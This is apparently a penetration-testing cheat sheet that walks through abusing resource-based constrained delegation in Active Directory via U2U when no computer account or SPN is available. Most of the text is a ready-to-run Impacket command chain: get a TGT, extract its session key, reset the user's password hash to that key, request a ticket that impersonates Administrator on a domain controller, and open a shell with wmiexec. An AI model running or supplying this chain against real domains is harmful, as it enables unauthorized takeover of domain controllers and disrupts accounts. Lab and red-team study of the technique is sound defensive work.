RBCD can be abused with a normal user in edge cases where we cannot create a computer account or the controlled account has no SPN. The technique uses U2U, the TGT session key, and a password change so the KDC can decrypt the S4U flow.
Conditions
The user has RBCD rights on the target.
The user can obtain its own TGT and session key.
The user's password can be changed.
The attack uses U2U for S4U2Self.
The final ticket is obtained through S4U2Proxy.
Get NT hash from password
pypykatz crypto nt 'Password123!'
Request TGT with NT hash
getTGT.py OOTW.LOCAL/beth.richards -hashes :<USER_NTLM> -dc-ip 10.10.10.200
Extract ticket session key
describeTicket.py beth.richards.ccache | grep 'Ticket Session Key'
Change user password to match the session key
changepasswd.py OOTW.LOCAL/beth.richards@10.10.10.200 -hashes :<USER_NTLM> -newhash :<TGT_SESSION_KEY>
Request service ticket with U2U
KRB5CCNAME=beth.richards.ccache getST.py -u2u -impersonate Administrator -spn TERMSRV/DC01.OOTW.LOCAL -no-pass OOTW.LOCAL/beth.richards -dc-ip 10.10.10.200
Use ticket
KRB5CCNAME=Administrator@TERMSRV_DC01.OOTW.LOCAL@OOTW.LOCAL.ccache wmiexec.py DC01.OOTW.LOCAL -k -no-pass
Notes
This is not the default RBCD path. Use the machine-account path first. U2U becomes relevant when the target scenario specifically blocks machine account creation or SPN ownership.
This changes the user's password material. Treat it as noisy and disruptive in labs unless the objective explicitly requires it.